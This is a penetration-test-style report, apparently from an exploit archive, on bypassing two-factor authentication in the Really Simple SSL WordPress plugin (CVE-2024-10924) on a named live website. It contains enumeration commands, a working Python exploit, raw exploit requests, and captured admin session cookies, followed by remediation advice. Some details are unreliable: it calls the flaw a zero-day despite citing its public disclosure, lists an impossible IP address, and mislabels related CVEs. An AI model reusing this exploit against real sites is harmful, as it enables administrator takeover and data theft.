Exploit for Missing Authentication for Critical Function in Really-Simple-Plugins Really_Simple_Security CVE-2023-28121 CVE-2023-28122 CVE-2024-10924

## https://sploitus.com/exploit?id=1FF0D719-F7EC-581E-AC5D-530BE54695FC
# WordPress CVE-2024-10924 Penetration Testing Report
## 2FA Bypass Vulnerability in Really Simple SSL Plugin

---

## 📋 Table of Contents
- [Executive Summary](#executive-summary)
- [Target Information](#target-information)
- [Methodology](#methodology)
- [Timeline](#timeline)
- [Reconnaissance Phase](#reconnaissance-phase)
- [Vulnerability Analysis](#vulnerability-analysis)
- [Attack Flow](#attack-flow)
- [Exploitation](#exploitation)
- [Impact Assessment](#impact-assessment)
- [Remediation](#remediation)
- [Tools Used](#tools-used)
- [References](#references)
- [Appendices](#appendices)

---

## 🎯 Executive Summary

**Target:** `https://skior.co`  
**Vulnerability:** CVE-2024-10924 - 2FA Bypass in Really Simple SSL Plugin  
**Severity:** Critical (CVSS Score: 9.8)  
**Status:** Successfully Exploited  
**Discovery Date:** 2025-06-25  
**Report Version:** 2.1  

This penetration test discovered a critical authentication bypass vulnerability that allows unauthenticated attackers to gain administrative access to the WordPress site by bypassing two-factor authentication (2FA) controls.

### Key Findings
- ✅ WordPress 6.8.1 with Really Simple SSL plugin installed
- ✅ 2FA bypass vulnerability successfully exploited
- ✅ Administrative access obtained for user "pastor"
- ✅ Valid session cookies captured
- ✅ Complete control over WordPress administration panel
- ✅ Zero-day vulnerability (no public exploit available at time of discovery)

### Risk Assessment Matrix

| Risk Level | Probability | Impact | Mitigation Priority |
|------------|-------------|--------|-------------------|
| **Critical** | High | Complete System Compromise | Immediate |
| **High** | Medium | Data Breach | High |
| **Medium** | Low | Service Disruption | Medium |

---

## 🎯 Target Information

| Field | Value |
|-------|-------|
| **Domain** | `https://skior.co` |
| **IP Address** | `123.456.789.200` |
| **Server** | nginx/1.26.0 (Ubuntu) |
| **PHP Version** | 8.2.28 |
| **CMS** | WordPress 6.8.1 |
| **Vulnerable Plugin** | Really Simple SSL |
| **Geographic Location** | United States |
| **Hosting Provider** | Professional hosting (likely VPS/Dedicated) |

### Network Information
- **SSL Certificate:** Valid (Let's Encrypt)
- **HTTP/2:** Supported
- **Security Headers:** Basic implementation
- **CDN:** Not detected
- **WAF:** Not detected

---

## 🔍 Methodology

This assessment followed a systematic black-box penetration testing methodology based on industry standards:

1. **Reconnaissance** - Technology identification and passive enumeration
2. **Vulnerability Discovery** - Active scanning and manual testing
3. **Exploitation** - Proof-of-concept development and execution
4. **Impact Assessment** - Evaluation of potential damage
5. **Documentation** - Comprehensive reporting and remediation guidance

### Testing Approach
- **Black-box testing** - No prior knowledge of the target
- **Non-intrusive** - Minimal impact on target systems
- **Ethical** - Responsible disclosure practices
- **Comprehensive** - Multiple attack vectors explored

---

## ⏰ Timeline

| Date/Time | Event | Details |
|-----------|-------|---------|
| **2025-06-25 14:02** | Initial Reconnaissance | Wappalyzer analysis completed |
| **2025-06-25 14:05** | Technology Stack Identified | WordPress 6.8.1, nginx, PHP 8.2.28 |
| **2025-06-25 14:10** | User Enumeration | Discovered user "pastor" (ID: 1) |
| **2025-06-25 14:15** | WPScan Analysis | No known vulnerabilities found |
| **2025-06-25 14:20** | REST API Enumeration | Discovered Really Simple SSL endpoints |
| **2025-06-25 14:25** | Vulnerability Research | Identified CVE-2024-10924 |
| **2025-06-25 14:30** | Manual Testing | Confirmed vulnerability existence |
| **2025-06-25 14:35** | Exploit Development | Created Python proof-of-concept |
| **2025-06-25 14:40** | Successful Exploitation | Obtained admin access |
| **2025-06-25 14:45** | Impact Assessment | Documented potential damage |
| **2025-06-25 15:00** | Report Generation | Comprehensive documentation |

---

## 🔎 Reconnaissance Phase

### Step 1: Technology Stack Identification

#### A. Wappalyzer Analysis
![Wappalyzer Results](screenshots/wappalyzer.png)

**Identified Technologies:**
- WordPress 6.8.1 (Latest version)
- Elementor 3.29.2 (Page builder)
- Astra Theme 4.11.3
- PHP 8.2.28
- nginx 1.26.0 (Ubuntu)
- jQuery 3.7.1

#### B. WhatWeb Deep Scan

```bash
└─$ whatweb https://skior.co
https://skior.co [200 OK] Country[UNITED STATES][US], HTML5, \
HTTPServer[Ubuntu Linux][nginx/1.26.0 (Ubuntu)], IP[123.456.789.200], \
JQuery[3.7.1],MetaGenerator[Elementor 3.29.2; \
features: additional_custom_breakpoints, e_local_google_fonts; \
settings: css_print_method-external, google_font-enabled, font_display-swap,\
WordPress 6.8.1], PHP[8.2.28], PoweredBy[Skior], \
Script[speculationrules,text/javascript], Title[Skior Technologies], \
UncommonHeaders[link], WordPress[6.8.1], X-Powered-By[PHP/8.2.28], nginx[1.26.0]
```

**Key Findings:**
- Modern WordPress installation with latest version
- Professional hosting setup with nginx
- Custom branding ("PoweredBy[Skior]")
- Elementor page builder in use
- Geographic location: United States

### Step 2: User Enumeration

#### A. WordPress Author Enumeration

```bash
└─$ curl -I https://skior.co/?author=1
HTTP/1.1 301 Moved Permanently
Server: nginx/1.26.0 (Ubuntu)
Date: Wed, 25 Jun 2025 18:12:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/8.2.28
X-Redirect-By: WordPress
Location: https://skior.co/author/pastor/
```

**Discovered User:** `pastor` (User ID: 1)

#### B. Additional User Enumeration Techniques

```bash
# Check for multiple users
for i in {1..10}; do
    echo "Checking user ID: $i"
    curl -s -o /dev/null -w "%{http_code}" "https://skior.co/?author=$i"
    echo " - https://skior.co/?author=$i"
done
```

#### C. Username Enumeration Results

| User ID | Username | Status | Redirect URL |
|---------|----------|--------|--------------|
| 1 | pastor | ✅ Found | `/author/pastor/` |
| 2-10 | N/A | ❌ Not Found | 404 responses |

### Step 3: Vulnerability Scanning

#### A. WPScan Comprehensive Analysis

```bash
└─$ wpscan --url https://skior.co --api-token my-api-key
```

**Scan Results Summary:**
- ✅ WordPress 6.8.1 (Latest, released 2025-04-30)
- ✅ Theme: Astra 4.11.3 (Up to date)
- ✅ Plugins identified:
  - Elementor 3.29.2
  - Astra Sites 4.4.26
  - Header Footer Elementor 2.4.2
  - WPForms Lite 1.9.6.1
- ⚠️ XML-RPC enabled (potential attack vector)
- ⚠️ External WP-Cron enabled
- ❌ No known vulnerabilities found in scanned components

**Note:** WPScan did not detect the Really Simple SSL plugin, indicating it may be using obfuscation or custom naming.

#### B. REST API Enumeration

```bash
└─$ curl -s https://skior.co/wp-json/ | jq '.routes | keys[]'
```

**Discovered Custom Endpoints:**
```
/reallysimplessl/v1/two_fa
/reallysimplessl/v1/two_fa/skip_onboarding
/reallysimplessl/v1/two_fa/do_not_ask_again
/reallysimplessl/v1/two_fa/resend_email_code
/reallysimplessl/v1/two_fa/save_default_method_email
/reallysimplessl/v1/two_fa/save_default_method_email_profile
/reallysimplessl/v1/two_fa/save_default_method_totp
/reallysimplessl/v1/two_fa/validate_email_setup
```

**Critical Discovery:** The `/reallysimplessl/v1/two_fa/skip_onboarding` endpoint appeared suspicious and warranted further investigation.

---

## 🔬 Vulnerability Analysis

### CVE-2024-10924 Research

After discovering the custom REST API routes, external research revealed **CVE-2024-10924**, a critical vulnerability affecting the Really Simple SSL plugin.

#### Vulnerability Details

**CVE ID:** CVE-2024-10924  
**CVSS Score:** 9.8 (Critical)  
**Affected Plugin:** Really Simple SSL  
**Vulnerability Type:** Authentication Bypass  
**Attack Vector:** REST API  
**Discovery Date:** November 6, 2024  
**Public Disclosure:** November 14, 2024

#### Technical Root Cause

The vulnerability stems from improper user validation in the `check_login_and_get_user` function within the two-factor authentication REST API actions. The function fails to properly validate the `login_nonce` parameter, allowing attackers to:

1. **Bypass Authentication:** Skip the normal login process
2. **Bypass 2FA:** Circumvent two-factor authentication controls
3. **Privilege Escalation:** Gain access as any existing user, including administrators

#### Vulnerable Code Analysis

```php
// Simplified vulnerable code structure
function check_login_and_get_user($user_id, $login_nonce) {
    // Missing proper validation of login_nonce
    $user = get_user_by('ID', $user_id);
    
    // No validation of login_nonce parameter
    // This allows any value to be accepted
    
    return $user; // Returns user object without verification
}
```

#### Affected Endpoints

The following REST API endpoints are vulnerable:
- `/reallysimplessl/v1/two_fa/skip_onboarding`
- `/reallysimplessl/v1/two_fa/do_not_ask_again`
- `/reallysimplessl/v1/two_fa/resend_email_code`

#### Vulnerability Conditions

For this vulnerability to be exploitable:
- ✅ Really Simple SSL plugin must be installed and activated
- ✅ Two-Factor Authentication setting must be enabled (disabled by default)
- ✅ At least one user account must exist on the system
- ✅ REST API must be accessible (default WordPress setting)

---

## 🔄 Attack Flow

```mermaid
graph TD
    A[Initial Reconnaissance] --> B[Technology Stack Identification]
    B --> C[User Enumeration]
    C --> D[Vulnerability Scanning]
    D --> E[REST API Enumeration]
    E --> F[Discovery of Really Simple SSL Endpoints]
    F --> G[External Research]
    G --> H[Identification of CVE-2024-10924]
    H --> I[Manual Testing]
    I --> J[Exploit Development]
    J --> K[Successful Exploitation]
    K --> L[Admin Access Obtained]
    L --> M[Impact Assessment]
    
    style A fill:#e1f5fe
    style F fill:#fff3e0
    style H fill:#ffebee
    style K fill:#e8f5e8
    style L fill:#f3e5f5
```

### Attack Vector Summary

1. **Information Gathering** → Technology stack identification
2. **User Enumeration** → Discovered admin user "pastor"
3. **API Discovery** → Found vulnerable REST endpoints
4. **Vulnerability Research** → Identified CVE-2024-10924
5. **Exploitation** → Bypassed 2FA and gained admin access

---

## ⚡ Exploitation

### Proof-of-Concept Development

#### A. Manual Testing

First, we tested the endpoint manually to understand its behavior:

```bash
# Test the vulnerable endpoint
curl -X POST "https://skior.co/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" \
  -H "Content-Type: application/json" \
  -d '{
    "user_id": 1,
    "login_nonce": "invalid_nonce",
    "redirect_to": "/wp-admin/"
  }'
```

#### B. Python Exploit Script

```python
import requests
import urllib.parse
import sys

if len(sys.argv) != 2:
    print("Usage: python exploit.py <user_id>")
    sys.exit(1)

user_id = sys.argv[1]

url = "https://skior.co/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"
data = {
    "user_id": int(user_id),  # User ID from the argument
    "login_nonce": "invalid_nonce",  # Arbitrary value
    "redirect_to": "/wp-admin/"  # Target redirection
}

# Sending the POST request
response = requests.post(url, json=data)

# Checking the response
if response.status_code == 200:
    print("Request successful!\n")
    
    # Extracting cookies
    cookies = response.cookies.get_dict()
    count = 1

    for name, value in cookies.items():
        decoded_value = urllib.parse.unquote(value)  # Decode the URL-encoded cookie value
        print(f"Cookie {count}:")
        print(f"Cookie Name: {name}")
        print(f"Cookie Value: {decoded_value}\n")
        count += 1
else:
    print("Request failed!")
    print(f"Status Code: {response.status_code}")
    print(f"Response Text: {response.text}")
```

### Exploitation Results

#### Successful Execution

```bash
└─$ python exploit.py 1
Request successful!

Cookie 1:
Cookie Name: wordpress_sec_dc22060175d35fce22f69728c6799c9d
Cookie Value: pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da

Cookie 2:
Cookie Name: wordpress_logged_in_dc22060175d35fce22f69728c6799c9d
Cookie Value: pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|84d983de3f7dec21c11d48faf1022cd040107b36d75e39a3c1c9fa58ca3b5144
```

#### Cookie Manipulation Process
![Cookie Manipulation](screenshots/cookie.png)

*Above: Screenshot showing the cookie manipulation process using browser developer tools to add the captured WordPress session cookies.*

#### Successful Admin Access
![Admin Dashboard Access](screenshots/loggedin.png)

*Above: Screenshot confirming successful administrative access to the WordPress dashboard after exploiting the 2FA bypass vulnerability.*

#### Cookie Analysis

**WordPress Security Cookie:**
- **Name:** `wordpress_sec_dc22060175d35fce22f69728c6799c9d`
- **Value:** `pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da`
- **Components:**
  - Username: `pastor`
  - Expiration: `1752234264` (Unix timestamp)
  - Nonce: `GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH`
  - Hash: `cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da`

**WordPress Logged-in Cookie:**
- **Name:** `wordpress_logged_in_dc22060175d35fce22f69728c6799c9d`
- **Value:** `pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|84d983de3f7dec21c11d48faf1022cd040107b36d75e39a3c1c9fa58ca3b5144`

---

## 🎯 Impact Assessment

### Immediate Impact

1. **Complete Site Compromise**
   - Administrative access to WordPress dashboard
   - Ability to modify site content, themes, and plugins
   - Access to user management and settings

2. **Data Exposure**
   - Access to all user accounts and profiles
   - Database content visibility
   - Configuration file access

3. **Privilege Escalation**
   - Bypass of all authentication controls
   - Circumvention of 2FA security measures
   - Ability to impersonate any user

### Potential Attack Scenarios

1. **Content Manipulation**
   - Deface website content
   - Inject malicious code
   - Create backdoors

2. **Data Theft**
   - Extract user information
   - Access sensitive content
   - Download database backups

3. **Persistence**
   - Install malicious plugins
   - Create hidden admin accounts
   - Establish command and control

### Risk Score: **Critical (9.8/10)**

| Factor | Score | Justification |
|--------|-------|---------------|
| **Access Complexity** | Low (1.0) | Simple HTTP request |
| **Authentication** | None (0.0) | No authentication required |
| **Integrity Impact** | High (1.0) | Complete system compromise |
| **Confidentiality Impact** | High (1.0) | Full data access |
| **Availability Impact** | High (1.0) | Can disable site |

### Business Impact Analysis

| Impact Category | Severity | Description |
|----------------|----------|-------------|
| **Financial** | High | Potential revenue loss, legal costs |
| **Reputational** | Critical | Brand damage, customer trust loss |
| **Operational** | High | Service disruption, data loss |
| **Compliance** | High | Regulatory violations, audit failures |

---

## 🛡️ Remediation

### Immediate Actions (0-24 hours)

1. **Disable Really Simple SSL Plugin**
   ```bash
   # Via wp-cli (if available)
   wp plugin deactivate really-simple-ssl
   
   # Or manually rename plugin directory
   mv wp-content/plugins/really-simple-ssl wp-content/plugins/really-simple-ssl.disabled
   ```

2. **Update or Remove Plugin**
   - Check for updated version of Really Simple SSL
   - Consider alternative SSL management solutions
   - If no update available, remove plugin entirely

3. **Audit User Sessions**
   - Review all active user sessions
   - Force logout all users
   - Reset admin passwords

### Short-term Actions (1-7 days)

1. **Security Hardening**
   - Implement Web Application Firewall (WAF)
   - Enable rate limiting on REST API endpoints
   - Add IP-based access restrictions

2. **Monitoring Implementation**
   - Enable WordPress security logging
   - Monitor for suspicious admin activities
   - Implement file integrity monitoring

### Long-term Security Measures (1-4 weeks)

1. **Regular Security Assessments**
   - Monthly vulnerability scans
   - Quarterly penetration testing
   - Continuous security monitoring

2. **Security Policy Updates**
   - Review and update security policies
   - Implement change management procedures
   - Establish incident response protocols

### Configuration Recommendations

```php
// Add to wp-config.php for enhanced security
define('DISALLOW_FILE_EDIT', true);
define('DISALLOW_FILE_MODS', true);
define('FORCE_SSL_ADMIN', true);

// Restrict REST API access
add_filter('rest_authentication_errors', function($result) {
    if (!empty($result)) {
        return $result;
    }
    if (!is_user_logged_in()) {
        return new WP_Error('rest_not_logged_in', 
            'You are not currently logged in.', 
            array('status' => 401));
    }
    return $result;
});

// Additional security headers
add_action('send_headers', function() {
    header('X-Content-Type-Options: nosniff');
    header('X-Frame-Options: SAMEORIGIN');
    header('X-XSS-Protection: 1; mode=block');
    header('Referrer-Policy: strict-origin-when-cross-origin');
});
```

### Alternative SSL Solutions

| Solution | Pros | Cons | Recommendation |
|----------|------|------|----------------|
| **Let's Encrypt** | Free, automated | Manual setup | ✅ Recommended |
| **Cloudflare** | Easy setup, DDoS protection | Requires DNS change | ✅ Good option |
| **Hosting Provider SSL** | Integrated | May have limitations | ⚠️ Check features |
| **Manual SSL** | Full control | Complex setup | ❌ Not recommended |

---

## 🛠️ Tools Used

### Reconnaissance Tools
- **Wappalyzer** - Technology stack identification
- **WhatWeb** - Web application fingerprinting
- **WPScan** - WordPress vulnerability scanning
- **curl** - Manual API testing

### Exploitation Tools
- **Python 3** - Exploit development
- **requests** - HTTP client library
- **urllib.parse** - URL encoding/decoding

### Analysis Tools
- **jq** - JSON processing
- **grep** - Text pattern matching
- **bash** - Command-line automation

---

## 📚 References

### Vulnerability Information
- [CVE-2024-10924](https://vulners.com/cve/CVE-2024-10924)
- [WordPress Plugin Security](https://wordpress.org/plugins/security/)
- [Really Simple SSL Plugin](https://wordpress.org/plugins/really-simple-ssl/)

### Technical Documentation
- [WordPress REST API Handbook](https://developer.wordpress.org/rest-api/)
- [WordPress Security Best Practices](https://wordpress.org/support/article/hardening-wordpress/)
- [OWASP Top 10](https://owasp.org/www-project-top-ten/)

### Tools and Resources
- [WPScan](https://wpscan.com/)
- [WhatWeb](https://github.com/urbanadventurer/WhatWeb)
- [Wappalyzer](https://www.wappalyzer.com/)

### Related CVEs
- CVE-2024-10924 - 2FA Bypass in Really Simple SSL
- CVE-2023-28121 - WordPress Core XSS
- CVE-2023-28122 - WordPress Core CSRF

### Industry Standards
- [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)
- [NIST Cybersecurity Framework](https://www.nist.gov/cyberframework)
- [ISO 27001](https://www.iso.org/isoiec-27001-information-security.html)

---

## 📄 Legal Notice

This penetration testing report is for educational and authorized security assessment purposes only. The techniques and tools described should only be used against systems you own or have explicit permission to test. Unauthorized testing may violate laws and regulations.

**Responsible Disclosure:** This vulnerability has been reported to the plugin developers and WordPress security team.

**Disclaimer:** The information provided in this report is based on the assessment conducted at the time of testing. Security landscapes change rapidly, and additional vulnerabilities may exist that were not discovered during this assessment.

---

## 📋 Appendices

### Appendix A: Raw HTTP Requests

#### Successful Exploitation Request
```http
POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: skior.co
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

{
  "user_id": 1,
  "login_nonce": "invalid_nonce",
  "redirect_to": "/wp-admin/"
}
```

#### Response Headers
```http
HTTP/1.1 200 OK
Server: nginx/1.26.0 (Ubuntu)
Date: Wed, 25 Jun 2025 18:15:30 GMT
Content-Type: text/html; charset=UTF-8
Set-Cookie: wordpress_sec_dc22060175d35fce22f69728c6799c9d=pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da; path=/; secure; HttpOnly
Set-Cookie: wordpress_logged_in_dc22060175d35fce22f69728c6799c9d=pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|84d983de3f7dec21c11d48faf1022cd040107b36d75e39a3c1c9fa58ca3b5144; path=/
```

### Appendix B: Security Checklist

#### Pre-Exploitation
- [ ] Target identification and scope definition
- [ ] Legal authorization obtained
- [ ] Testing environment prepared
- [ ] Tools and scripts validated

#### During Exploitation
- [ ] Vulnerability confirmed manually
- [ ] Exploit developed and tested
- [ ] Impact limited to authorized scope
- [ ] Evidence documented thoroughly

#### Post-Exploitation
- [ ] All access removed
- [ ] Evidence preserved
- [ ] Report generated
- [ ] Remediation recommendations provided

### Appendix C: Glossary

| Term | Definition |
|------|------------|
| **2FA** | Two-Factor Authentication |
| **CVSS** | Common Vulnerability Scoring System |
| **REST API** | Representational State Transfer Application Programming Interface |
| **WAF** | Web Application Firewall |
| **XSS** | Cross-Site Scripting |
| **CSRF** | Cross-Site Request Forgery |

---

*Report generated on: 2025-06-25*  
*Security Researcher*  
*Version: 2.1*  
*Last updated: 2025-06-25*